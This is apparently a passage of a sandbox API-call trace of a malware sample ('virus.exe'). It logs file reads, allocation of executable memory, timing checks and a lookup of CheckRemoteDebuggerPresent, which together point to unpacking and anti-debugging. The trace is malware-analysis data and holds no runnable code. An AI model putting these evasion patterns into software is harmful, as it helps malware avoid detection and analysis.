"c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x28fce0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x28fce8*=0xfc, IoStatusBlock=0x28fce0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0071.791] RtlFreeAnsiString (AnsiString="\\") [0071.841] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0071.890] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fef0, BufferLength=0x40, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fef0*) returned 0x0 [0071.940] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0071.940] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fedc, BufferLength=0x14, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fedc*) returned 0x0 [0071.940] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0071.940] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdfc, BufferLength=0xe0, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdfc*) returned 0x0 [0071.941] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0071.941] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0071.941] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0071.941] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0071.941] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0071.941] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0071.941] NtClose (Handle=0xfc) returned 0x0 [0071.998] GetLastError () returned 0x0 [0071.998] SetLastError (dwErrCode=0x0) [0072.048] GetLastError () returned 0x0 [0072.048] SetLastError (dwErrCode=0x0) [0072.048] GetLastError () returned 0x0 [0072.048] SetLastError (dwErrCode=0x0) [0072.048] GetLastError () returned 0x0 [0072.048] SetLastError (dwErrCode=0x0) [0072.358] GetCurrentThreadId () returned 0xf38 [0072.359] VirtualAlloc (lpAddress=0x32f4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x40) returned 0x32f4000 [0072.364] GetTickCount () returned 0x1d024f6 [0072.365] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319308687) returned 1 [0072.365] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319338354) returned 1 [0072.367] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319540430) returned 1 [0072.367] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319549737) returned 1 [0072.367] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319560446) returned 1 [0072.367] Sleep (dwMilliseconds=0x0) [0072.368] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319608218) returned 1 [0072.368] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319620511) returned 1 [0072.368] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319630465) returned 1 [0072.368] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319640146) returned 1 [0072.368] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319647390) returned 1 [0072.368] Sleep (dwMilliseconds=0x0) [0072.369] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319696153) returned 1 [0072.369] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319702378) returned 1 [0072.369] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319709009) returned 1 [0072.369] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319715015) returned 1 [0072.369] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319722320) returned 1 [0072.369] Sleep (dwMilliseconds=0x0) [0072.369] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319754420) returned 1 [0072.369] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319763832) returned 1 [0072.369] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319770851) returned 1 [0072.369] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319798965) returned 1 [0072.370] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3055319809694) returned 1 [0072.370] Sleep (dwMilliseconds=0x0) [0072.384] GetTickCount () returned 0x1d02516 [0072.384] VirtualFree (lpAddress=0x3314000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0072.486] GetLastError () returned 0x0 [0072.486] SetLastError (dwErrCode=0x0) [0072.534] GetLastError () returned 0x0 [0072.534] SetLastError (dwErrCode=0x0) [0072.534] GetLastError () returned 0x0 [0072.534] SetLastError (dwErrCode=0x0) [0072.534] GetLastError () returned 0x0 [0072.535] SetLastError (dwErrCode=0x0) [0072.535] GetLastError () returned 0x0 [0072.535] SetLastError (dwErrCode=0x0) [0072.535] GetLastError () returned 0x0 [0072.535] SetLastError (dwErrCode=0x0) [0072.535] GetLastError () returned 0x0 [0072.535] SetLastError (dwErrCode=0x0) [0072.588] GetLastError () returned 0x0 [0072.588] SetLastError (dwErrCode=0x0) [0072.588] GetLastError () returned 0x0 [0072.588] SetLastError (dwErrCode=0x0) [0072.588] GetLastError () returned 0x0 [0072.588] SetLastError (dwErrCode=0x0) [0072.658] GetLastError () returned 0x0 [0072.658] SetLastError (dwErrCode=0x0) [0072.658] GetLastError () returned 0x0 [0072.659] SetLastError (dwErrCode=0x0) [0072.659] GetLastError () returned 0x0 [0072.659] SetLastError (dwErrCode=0x0) [0072.659] GetLastError () returned 0x0 [0072.659] SetLastError (dwErrCode=0x0) [0072.659] GetLastError () returned 0x0 [0072.659] SetLastError (dwErrCode=0x0) [0072.659] GetLastError () returned 0x0 [0072.659] SetLastError (dwErrCode=0x0) [0072.659] GetLastError () returned 0x0 [0072.660] SetLastError (dwErrCode=0x0) [0072.660] GetLastError () returned 0x0 [0072.660] SetLastError (dwErrCode=0x0) [0072.660] GetLastError () returned 0x0 [0072.660] SetLastError (dwErrCode=0x0) [0072.709] GetLastError () returned 0x0 [0072.709] SetLastError (dwErrCode=0x0) [0072.709] GetLastError () returned 0x0 [0072.710] SetLastError (dwErrCode=0x0) [0072.710] GetLastError () returned 0x0 [0072.710] SetLastError (dwErrCode=0x0) [0072.710] GetLastError () returned 0x0 [0072.710] SetLastError (dwErrCode=0x0) [0072.767] GetLastError () returned 0x0 [0072.768] SetLastError (dwErrCode=0x0) [0072.768] GetLastError () returned 0x0 [0072.768] SetLastError (dwErrCode=0x0) [0072.769] GetLastError () returned 0x0 [0072.770] SetLastError (dwErrCode=0x0) [0072.770] GetLastError () returned 0x0 [0072.770] SetLastError (dwErrCode=0x0) [0072.858] GetLastError () returned 0x0 [0072.858] SetLastError (dwErrCode=0x0) [0072.858] GetLastError () returned 0x0 [0072.858] SetLastError (dwErrCode=0x0) [0072.858] GetLastError () returned 0x0 [0072.858] SetLastError (dwErrCode=0x0) [0072.907] GetLastError () returned 0x0 [0072.907] SetLastError (dwErrCode=0x0) [0072.907] GetLastError () returned 0x0 [0072.908] SetLastError (dwErrCode=0x0) [0072.908] GetLastError () returned 0x0 [0072.908] SetLastError (dwErrCode=0x0) [0072.908] GetLastError () returned 0x0 [0072.908] SetLastError (dwErrCode=0x0) [0072.993] VirtualAlloc (lpAddress=0x3314000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3314000 [0072.995] GetLastError () returned 0x0 [0072.995] SetLastError (dwErrCode=0x0) [0072.995] GetLastError () returned 0x0 [0072.995] SetLastError (dwErrCode=0x0) [0072.995] GetLastError () returned 0x0 [0072.995] SetLastError (dwErrCode=0x0) [0072.995] GetLastError () returned 0x0 [0072.995] SetLastError (dwErrCode=0x0) [0072.995] GetLastError () returned 0x0 [0072.996] SetLastError (dwErrCode=0x0) [0073.062] GetLastError () returned 0x0 [0073.062] SetLastError (dwErrCode=0x0) [0073.062] GetLastError () returned 0x0 [0073.062] SetLastError (dwErrCode=0x0) [0073.074] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f504, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0073.075] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0073.076] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0073.076] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f504, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0073.077] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0073.077] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f504, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0073.078] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0073.078] GetLastError () returned 0x0 [0073.078] SetLastError (dwErrCode=0x0) [0073.146] GetLastError () returned 0x0 [0073.146] SetLastError (dwErrCode=0x0) [0073.146] GetLastError () returned 0x0 [0073.147] SetLastError (dwErrCode=0x0) [0073.147] GetLastError () returned 0x0 [0073.147] SetLastError (dwErrCode=0x0) [0073.147] GetLastError () returned 0x0 [0073.147] SetLastError (dwErrCode=0x0) [0073.214] GetLastError () returned 0x0 [0073.214] SetLastError (dwErrCode=0x0) [0073.214] GetLastError () returned 0x0 [0073.214] SetLastError (dwErrCode=0x0) [0073.214] GetLastError () returned 0x0 [0073.214] SetLastError (dwErrCode=0x0) [0073.214] GetLastError () returned 0x0 [0073.217] SetLastError (dwErrCode=0x0) [0073.217] GetLastError () returned 0x0 [0073.217] SetLastError (dwErrCode=0x0) [0073.282] GetLastError () returned 0x0 [0073.282] SetLastError (dwErrCode=0x0) [0073.282] GetLastError () returned 0x0 [0073.282] SetLastError (dwErrCode=0x0) [0073.282] GetLastError () returned 0x0 [0073.282] SetLastError (dwErrCode=0x0) [0073.339] GetLastError () returned 0x0 [0073.339] SetLastError (dwErrCode=0x0) [0073.393] GetLastError () returned 0x0 [0073.394] SetLastError (dwErrCode=0x0) [0073.394] GetLastError () returned 0x0 [0073.394] SetLastError (dwErrCode=0x0) [0073.394] GetLastError () returned 0x0 [0073.394] SetLastError (dwErrCode=0x0) [0073.394] GetLastError () returned 0x0 [0073.394] SetLastError (dwErrCode=0x0) [0073.444] GetLastError () returned 0x0 [0073.444] SetLastError (dwErrCode=0x0) [0073.444] GetLastError () returned 0x0 [0073.444] SetLastError (dwErrCode=0x0) [0073.444] GetLastError () returned 0x0 [0073.444] SetLastError (dwErrCode=0x0) [0073.491] GetLastError () returned 0x0 [0073.492] SetLastError (dwErrCode=0x0) [0073.492] GetLastError () returned 0x0 [0073.492] SetLastError (dwErrCode=0x0) [0073.492] GetLastError () returned 0x0 [0073.492] SetLastError (dwErrCode=0x0) [0073.540] GetLastError () returned 0x0 [0073.541] SetLastError (dwErrCode=0x0) [0073.541] GetLastError () returned 0x0 [0073.541] SetLastError (dwErrCode=0x0) [0073.541] GetLastError () returned 0x0 [0073.541] SetLastError (dwErrCode=0x0) [0073.541] GetLastError () returned 0x0 [0073.541] SetLastError (dwErrCode=0x0) [0073.541] GetLastError () returned 0x0 [0073.541] SetLastError (dwErrCode=0x0) [0073.691] VirtualAlloc (lpAddress=0x3324000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3324000 [0073.742] VirtualFree (lpAddress=0x3324000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0073.792] GetLastError () returned 0x0 [0073.792] SetLastError (dwErrCode=0x0) [0073.792] GetLastError () returned 0x0 [0073.792] SetLastError (dwErrCode=0x0) [0073.792] GetLastError () returned 0x0 [0073.793] SetLastError (dwErrCode=0x0) [0073.793] GetLastError () returned 0x0 [0073.793] SetLastError (dwErrCode=0x0) [0073.843] GetLastError () returned 0x0 [0073.843] SetLastError (dwErrCode=0x0) [0073.843] GetLastError () returned 0x0 [0073.843] SetLastError (dwErrCode=0x0) [0073.843] GetLastError () returned 0x0 [0073.844] SetLastError (dwErrCode=0x0) [0073.892] GetLastError () returned 0x0 [0073.892] SetLastError (dwErrCode=0x0) [0073.892] GetLastError () returned 0x0 [0073.892] SetLastError (dwErrCode=0x0) [0073.892] GetLastError () returned 0x0 [0073.892] SetLastError (dwErrCode=0x0) [0073.892] GetLastError () returned 0x0 [0073.892] SetLastError (dwErrCode=0x0) [0073.942] GetLastError () returned 0x0 [0073.942] SetLastError (dwErrCode=0x0) [0073.942] GetLastError () returned 0x0 [0073.943] SetLastError (dwErrCode=0x0) [0073.943] GetLastError () returned 0x0 [0073.943] SetLastError (dwErrCode=0x0) [0073.992] GetLastError () returned 0x0 [0073.992] SetLastError (dwErrCode=0x0) [0073.992] GetLastError () returned 0x0 [0073.992] SetLastError (dwErrCode=0x0) [0073.992] GetLastError () returned 0x0 [0073.992] SetLastError (dwErrCode=0x0) [0074.041] GetLastError () returned 0x0 [0074.041] SetLastError (dwErrCode=0x0) [0074.041] GetLastError () returned 0x0 [0074.041] SetLastError (dwErrCode=0x0) [0074.041] GetLastError () returned 0x0 [0074.041] SetLastError (dwErrCode=0x0) [0074.041] GetLastError () returned 0x0 [0074.042] SetLastError (dwErrCode=0x0) [0074.042] GetLastError () returned 0x0 [0074.042] SetLastError (dwErrCode=0x0) [0074.091] GetLastError () returned 0x0 [0074.091] SetLastError (dwErrCode=0x0) [0074.091] GetLastError () returned 0x0 [0074.091] SetLastError (dwErrCode=0x0) [0074.091] GetLastError () returned 0x0 [0074.091] SetLastError (dwErrCode=0x0) [0074.142] GetLastError () returned 0x0 [0074.142] SetLastError (dwErrCode=0x0) [0074.142] GetLastError () returned 0x0 [0074.142] SetLastError (dwErrCode=0x0) [0074.142] GetLastError () returned 0x0 [0074.142] SetLastError (dwErrCode=0x0) [0074.191] GetLastError () returned 0x0 [0074.192] SetLastError (dwErrCode=0x0) [0074.192] GetLastError () returned 0x0 [0074.192] SetLastError (dwErrCode=0x0) [0074.192] GetLastError () returned 0x0 [0074.192] SetLastError (dwErrCode=0x0) [0074.192] GetLastError () returned 0x0 [0074.192] SetLastError (dwErrCode=0x0) [0074.241] GetLastError () returned 0x0 [0074.241] SetLastError (dwErrCode=0x0) [0074.241] GetLastError () returned 0x0 [0074.241] SetLastError (dwErrCode=0x0) [0074.241] GetLastError () returned 0x0 [0074.241] SetLastError (dwErrCode=0x0) [0074.241] GetLastError () returned 0x0 [0074.241] SetLastError (dwErrCode=0x0) [0074.295] GetLastError () returned 0x0 [0074.295] SetLastError (dwErrCode=0x0) [0074.295] GetLastError () returned 0x0 [0074.295] SetLastError (dwErrCode=0x0) [0074.295] GetLastError () returned 0x0 [0074.295] SetLastError (dwErrCode=0x0) [0074.391] GetLastError () returned 0x0 [0074.391] SetLastError (dwErrCode=0x0) [0074.391] GetLastError () returned 0x0 [0074.391] SetLastError (dwErrCode=0x0) [0074.391] GetLastError () returned 0x0 [0074.391] SetLastError (dwErrCode=0x0) [0074.391] GetLastError () returned 0x0 [0074.391] SetLastError (dwErrCode=0x0) [0074.391] GetLastError () returned 0x0 [0074.391] SetLastError (dwErrCode=0x0) [0074.391] GetLastError () returned 0x0 [0074.392] SetLastError (dwErrCode=0x0) [0074.469] GetLastError () returned 0x0 [0074.470] SetLastError (dwErrCode=0x0) [0074.470] GetLastError () returned 0x0 [0074.470] SetLastError (dwErrCode=0x0) [0074.540] GetCurrentThreadId () returned 0xf38 [0074.541] GetLastError () returned 0x0 [0074.541] SetLastError (dwErrCode=0x0) [0074.541] GetLastError () returned 0x0 [0074.541] SetLastError (dwErrCode=0x0) [0074.590] GetLastError () returned 0x0 [0074.590] SetLastError (dwErrCode=0x0) [0074.590] GetLastError () returned 0x0 [0074.590] SetLastError (dwErrCode=0x0) [0074.590] GetLastError () returned 0x0 [0074.591] SetLastError (dwErrCode=0x0) [0074.638] GetCurrentThreadId () returned 0xf38 [0074.638] GetLastError () returned 0x0 [0074.638] SetLastError (dwErrCode=0x0) [0074.639] GetLastError () returned 0x0 [0074.639] SetLastError (dwErrCode=0x0) [0074.639] GetLastError () returned 0x0 [0074.639] SetLastError (dwErrCode=0x0) [0074.639] GetCurrentThreadId () returned 0xf38 [0074.639] GetLastError () returned 0x0 [0074.639] SetLastError (dwErrCode=0x0) [0074.691] GetLastError () returned 0x0 [0074.691] SetLastError (dwErrCode=0x0) [0074.691] GetLastError () returned 0x0 [0074.691] SetLastError (dwErrCode=0x0) [0074.691] GetLastError () returned 0x0 [0074.691] SetLastError (dwErrCode=0x0) [0074.739] GetLastError () returned 0x0 [0074.739] SetLastError (dwErrCode=0x0) [0074.739] GetLastError () returned 0x0 [0074.739] SetLastError (dwErrCode=0x0) [0074.739] GetCurrentThreadId () returned 0xf38 [0074.742] GetLastError () returned 0x0 [0074.742] SetLastError (dwErrCode=0x0) [0074.742] GetLastError () returned 0x0 [0074.742] SetLastError (dwErrCode=0x0) [0074.742] GetLastError () returned 0x0 [0074.742] SetLastError (dwErrCode=0x0) [0074.792] GetCurrentThreadId () returned 0xf38 [0074.792] GetLastError () returned 0x0 [0074.792] SetLastError (dwErrCode=0x0) [0074.792] GetLastError () returned 0x0 [0074.792] SetLastError (dwErrCode=0x0) [0074.792] GetLastError () returned 0x0 [0074.792] SetLastError (dwErrCode=0x0) [0074.792] GetCurrentThreadId () returned 0xf38 [0074.793] GetLastError () returned 0x0 [0074.793] SetLastError (dwErrCode=0x0) [0074.840] GetLastError () returned 0x0 [0074.840] SetLastError (dwErrCode=0x0) [0074.841] GetLastError () returned 0x0 [0074.841] SetLastError (dwErrCode=0x0) [0074.841] GetCurrentThreadId () returned 0xf38 [0074.841] GetLastError () returned 0x0 [0074.841] SetLastError (dwErrCode=0x0) [0074.889] GetLastError () returned 0x0 [0074.889] SetLastError (dwErrCode=0x0) [0074.889] GetLastError () returned 0x0 [0074.890] SetLastError (dwErrCode=0x0) [0074.890] GetCurrentThreadId () returned 0xf38 [0074.890] GetLastError () returned 0x0 [0074.890] SetLastError (dwErrCode=0x0) [0074.890] GetLastError () returned 0x0 [0074.890] SetLastError (dwErrCode=0x0) [0074.890] GetLastError () returned 0x0 [0074.890] SetLastError (dwErrCode=0x0) [0074.939] GetCurrentThreadId () returned 0xf38 [0074.939] GetLastError () returned 0x0 [0074.939] SetLastError (dwErrCode=0x0) [0074.939] GetLastError () returned 0x0 [0074.939] SetLastError (dwErrCode=0x0) [0074.939] GetLastError () returned 0x0 [0074.940] SetLastError (dwErrCode=0x0) [0074.940] GetLastError () returned 0x0 [0074.940] SetLastError (dwErrCode=0x0) [0074.988] GetLastError () returned 0x0 [0074.988] SetLastError (dwErrCode=0x0) [0074.988] GetLastError () returned 0x0 [0074.989] SetLastError (dwErrCode=0x0) [0074.989] GetLastError () returned 0x0 [0074.989] SetLastError (dwErrCode=0x0) [0075.040] GetLastError () returned 0x0 [0075.040] SetLastError (dwErrCode=0x0) [0075.040] GetLastError () returned 0x0 [0075.040] SetLastError (dwErrCode=0x0) [0075.040] GetLastError () returned 0x0 [0075.040] SetLastError (dwErrCode=0x0) [0075.040] GetLastError () returned 0x0 [0075.040] SetLastError (dwErrCode=0x0) [0075.040] GetLastError () returned 0x0 [0075.040] SetLastError (dwErrCode=0x0) [0075.089] GetLastError () returned 0x0 [0075.089] SetLastError (dwErrCode=0x0) [0075.089] GetLastError () returned 0x0 [0075.090] SetLastError (dwErrCode=0x0) [0075.090] GetLastError () returned 0x0 [0075.090] SetLastError (dwErrCode=0x0) [0075.138] GetLastError () returned 0x0 [0075.138] SetLastError (dwErrCode=0x0) [0075.139] GetLastError () returned 0x0 [0075.139] SetLastError (dwErrCode=0x0) [0075.139] GetLastError () returned 0x0 [0075.139] SetLastError (dwErrCode=0x0) [0075.139] GetLastError () returned 0x0 [0075.139] SetLastError (dwErrCode=0x0) [0075.188] GetLastError () returned 0x0 [0075.188] SetLastError (dwErrCode=0x0) [0075.188] GetLastError () returned 0x0 [0075.188] SetLastError (dwErrCode=0x0) [0075.188] GetLastError () returned 0x0 [0075.188] SetLastError (dwErrCode=0x0) [0075.237] GetLastError () returned 0x0 [0075.237] SetLastError (dwErrCode=0x0) [0075.237] GetLastError () returned 0x0 [0075.237] SetLastError (dwErrCode=0x0) [0075.237] GetLastError () returned 0x0 [0075.237] SetLastError (dwErrCode=0x0) [0075.237] GetLastError () returned 0x0 [0075.238] SetLastError (dwErrCode=0x0) [0075.238] GetLastError () returned 0x0 [0075.238] SetLastError (dwErrCode=0x0) [0075.289] GetLastError () returned 0x0 [0075.290] SetLastError (dwErrCode=0x0) [0075.290] GetLastError () returned 0x0 [0075.290] SetLastError (dwErrCode=0x0) [0075.290] GetLastError () returned 0x0 [0075.290] SetLastError (dwErrCode=0x0) [0075.337] GetLastError () returned 0x0 [0075.338] SetLastError (dwErrCode=0x0) [0075.339] GetLastError () returned 0x0 [0075.339] SetLastError (dwErrCode=0x0) [0075.339] GetLastError () returned 0x0 [0075.339] SetLastError (dwErrCode=0x0) [0075.339] GetLastError () returned 0x0 [0075.339] SetLastError (dwErrCode=0x0) [0075.388] GetLastError () returned 0x0 [0075.388] SetLastError (dwErrCode=0x0) [0075.388] GetLastError () returned 0x0 [0075.388] SetLastError (dwErrCode=0x0) [0075.388] GetLastError () returned 0x0 [0075.388] SetLastError (dwErrCode=0x0) [0075.388] GetLastError () returned 0x0 [0075.388] SetLastError (dwErrCode=0x0) [0075.439] GetLastError () returned 0x0 [0075.439] SetLastError (dwErrCode=0x0) [0075.439] GetLastError () returned 0x0 [0075.439] SetLastError (dwErrCode=0x0) [0075.439] GetLastError () returned 0x0 [0075.440] SetLastError (dwErrCode=0x0) [0075.440] GetLastError () returned 0x0 [0075.440] SetLastError (dwErrCode=0x0) [0075.489] GetLastError () returned 0x0 [0075.489] SetLastError (dwErrCode=0x0) [0075.489] GetLastError () returned 0x0 [0075.489] SetLastError (dwErrCode=0x0) [0075.537] GetLastError () returned 0x0 [0075.537] SetLastError (dwErrCode=0x0) [0075.537] GetLastError () returned 0x0 [0075.538] SetLastError (dwErrCode=0x0) [0075.586] GetLastError () returned 0x0 [0075.586] SetLastError (dwErrCode=0x0) [0075.586] GetLastError () returned 0x0 [0075.586] SetLastError (dwErrCode=0x0) [0075.664] GetLastError () returned 0x0 [0075.664] SetLastError (dwErrCode=0x0) [0075.664] GetLastError () returned 0x0 [0075.665] SetLastError (dwErrCode=0x0) [0075.665] GetLastError () returned 0x0 [0075.665] SetLastError (dwErrCode=0x0) [0075.748] GetLastError () returned 0x0 [0075.749] SetLastError (dwErrCode=0x0) [0075.749] GetLastError () returned 0x0 [0075.749] SetLastError (dwErrCode=0x0) [0075.749] VirtualFree (lpAddress=0x3314000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0075.751] GetLastError () returned 0x0 [0075.751] SetLastError (dwErrCode=0x0) [0075.751] GetLastError () returned 0x0 [0075.752] SetLastError (dwErrCode=0x0) [0075.839] GetLastError () returned 0x0 [0075.839] SetLastError (dwErrCode=0x0) [0075.839] GetLastError () returned 0x0 [0075.839] SetLastError (dwErrCode=0x0) [0075.953] GetLastError () returned 0x0 [0075.953] SetLastError (dwErrCode=0x0) [0075.953] GetLastError () returned 0x0 [0075.953] SetLastError (dwErrCode=0x0) [0075.953] GetLastError () returned 0x0 [0075.953] SetLastError (dwErrCode=0x0) [0075.954] GetLastError () returned 0x0 [0075.954] SetLastError (dwErrCode=0x0) [0076.043] GetLastError () returned 0x0 [0076.044] SetLastError (dwErrCode=0x0) [0076.044] GetLastError () returned 0x0 [0076.044] SetLastError (dwErrCode=0x0) [0076.044] GetLastError () returned 0x0 [0076.044] SetLastError (dwErrCode=0x0) [0076.114] GetLastError () returned 0x0 [0076.114] SetLastError (dwErrCode=0x0) [0076.114] GetLastError () returned 0x0 [0076.114] SetLastError (dwErrCode=0x0) [0076.114] GetLastError () returned 0x0 [0076.114] SetLastError (dwErrCode=0x0) [0076.180] GetLastError () returned 0x0 [0076.180] SetLastError (dwErrCode=0x0) [0076.180] GetLastError () returned 0x0 [0076.180] SetLastError (dwErrCode=0x0) [0076.180] GetLastError () returned 0x0 [0076.180] SetLastError (dwErrCode=0x0) [0076.180] GetLastError () returned 0x0 [0076.180] SetLastError (dwErrCode=0x0) [0076.246] GetLastError () returned 0x0 [0076.246] SetLastError (dwErrCode=0x0) [0076.246] GetLastError () returned 0x0 [0076.247] SetLastError (dwErrCode=0x0) [0076.247] GetLastError () returned 0x0 [0076.247] SetLastError (dwErrCode=0x0) [0076.247] GetLastError () returned 0x0 [0076.247] SetLastError (dwErrCode=0x0) [0076.247] GetLastError () returned 0x0 [0076.248] SetLastError (dwErrCode=0x0) [0076.318] GetLastError () returned 0x0 [0076.318] SetLastError (dwErrCode=0x0) [0076.318] GetLastError () returned 0x0 [0076.318] SetLastError (dwErrCode=0x0) [0076.318] GetLastError () returned 0x0 [0076.319] SetLastError (dwErrCode=0x0) [0076.319] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0076.319] GetLastError () returned 0x0 [0076.319] SetLastError (dwErrCode=0x0) [0076.388] GetLastError () returned 0x0 [0076.388] SetLastError (dwErrCode=0x0) [0076.388] GetLastError () returned 0x0 [0076.388] SetLastError (dwErrCode=0x0) [0076.452] GetProcAddress (hModule=0x75a80000, lpProcName="CheckRemoteDebuggerPresent") returned 0x75abb0de [0076.452] GetLastError () returned 0x0 [0076.452] SetLastError (dwErrCode=0x0) [0076.452] GetLastError () returned 0x0 [0076.453] SetLastError (dwErrCode=0x0) [0076.453] GetLastError () returned 0x0 [0076.453] SetLastError (dwErrCode=0x0) [0076.518] GetLocalTime (in: lpSystemTime=0x28fe6c | out: lpSystemTime=0x28fe6c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x6, wMilliseconds=0x4c)) [0076.518] GetLastError () returned 0x0 [0076.518] SetLastError (dwErrCode=0x0) [0076.583] GetLastError () returned 0x0 [0076.583] SetLastError (dwErrCode=0x0) [0076.583] GetCurrentThreadId () returned 0xf38 [0076.584] GetLastError () returned 0x0 [0076.584] SetLastError (dwErrCode=0x0) [0076.584] GetLastError () returned 0x0 [0076.584] SetLastError (dwErrCode=0x0) [0076.584] GetLastError () returned 0x0 [0076.584] SetLastError (dwErrCode=0x0) [0076.584] GetLastError () returned 0x0 [0076.584] SetLastError (dwErrCode=0x0) [0076.584] GetLastError () returned 0x0 [0076.585] SetLastError (dwErrCode=0x0) [0076.585] GetCurrentThreadId () returned 0xf38 [0076.585] GetLastError () returned 0x0 [0076.585] SetLastError (dwErrCode=0x0) 